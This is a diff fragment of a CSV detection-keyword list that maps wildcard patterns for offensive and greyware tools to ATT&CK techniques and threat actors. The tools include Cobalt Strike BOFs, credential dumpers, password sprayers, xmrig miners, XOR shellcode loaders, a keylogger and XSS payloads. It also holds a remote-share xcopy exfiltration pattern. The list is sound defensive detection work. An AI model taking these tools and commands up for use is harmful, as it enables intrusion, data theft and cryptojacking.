+"*xcopy c:\* \\*\c$*","greyware_tool_keyword","xcopy","command abused by attackers - exfiltraiton to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*xforcered/CredBandit*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon 
Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/CredBandit","1","1","N/A","10","10","218","25","2021-07-14T17:42:41Z","2021-03-17T15:19:33Z"
+"*xforcered/Detect-Hooks*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/xforcered/Detect-Hooks","1","1","N/A","10","10","91","6","2021-07-22T20:13:16Z","2021-07-23T16:10:37Z"
+"*xforwardedfor.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*xFreed0m/RDPassSpray*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*xfreerdp /v*SOCtest*AllLegitHere*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","0","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z"
+"*xfrm_poc*lucky0*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*xillwillx*","offensive_tool_keyword","Github Username","github repo username hosting 
red team tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xillwillx","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*XiphosResearch*","offensive_tool_keyword","exploits","Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.","T1203 - T1068 - T1062 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/XiphosResearch/exploits","1","0","N/A","N/A","10","1433","606","2023-07-20T10:15:01Z","2015-03-05T11:15:07Z"
+"*x-ishavocframework*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z"
+"*xmendez/wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*XML-External-Entity-(XXE)-Payloads*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
+"*xmrig-*-bionic-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-focal-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-freebsd-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-gcc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-linux-static-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-linux-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-macos-arm64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-macos-x64.tar.gz*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig-*-msvc-win64.zip*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrig.exe -*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xmrpool.eu:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*xor.exe *.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","0","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z"
+"*xor.py *.dll*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z"
+"*XOR_b64_encrypted*covenant.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*XOR_b64_encrypted*covenant2.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*XOR_b64_encrypted*havoc.txt*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*xor_payload*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*xor-bin.py *.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*xoreaxeaxeax*","offensive_tool_keyword","Github Username","github username hosting obfuscation and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/xoreaxeaxeax","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*XorEncoder.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*XOR-Payloads.py*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*xpipe \\*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","0","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe*lsass*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return 
their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpipe.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/xPipe","1","1","N/A","10","10","73","21","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z" +"*xpn*ntlmquic*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*xrdp.c*","offensive_tool_keyword","xrdp","xrdp provides a graphical login to 
remote machines using Microsoft Remote Desktop Protocol (RDP). xrdp accepts connections from a variety of RDP clients: FreeRDP. rdesktop. NeutrinoRDP and Microsoft Remote Desktop Client (for Windows. Mac OS. iOS and Android).can be used by attacker","T1076 - T1021.003 - T1021.002","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/neutrinolabs/xrdp","1","0","N/A","N/A","10","4824","2704","2023-10-02T15:48:32Z","2011-04-25T14:31:17Z" +"*xs.exe -connect *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*xscreensaver_log_priv_esc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*xshell_xftp_password.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*XSpear -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*xspy -display*","offensive_tool_keyword","xspy -display","Keylogger Monitors keystrokes even the keyboard is grabbed.","T1056 - T1059 - T1007 - T1113","TA0006 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/mnp/xspy/blob/master/xspy.c","1","0","N/A","N/A","1","22","15","2018-03-19T12:16:25Z","2011-07-26T18:37:00Z" +"*xsrfprobe -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*xsser -u * -g */login?password=* --Coo*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*XSS-labs*","offensive_tool_keyword","xss-labs","small set of PHP scripts to practice exploiting XSS and CSRF injection vulns","T1059.003 - T1190 - T1600","TA0002 - TA0007 - ","N/A","N/A","Web Attacks","https://github.com/paralax/xss-labs","1","1","N/A","N/A","1","50","26","2017-12-22T19:38:15Z","2016-03-24T19:43:37Z"
+"*XSS-Payloads*","offensive_tool_keyword","XSS-Payloads","A fine collection of selected javascript payloads.","T1059 - T1068 - T1071 - T1506","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://www.xss-payloads.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*xssrays.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
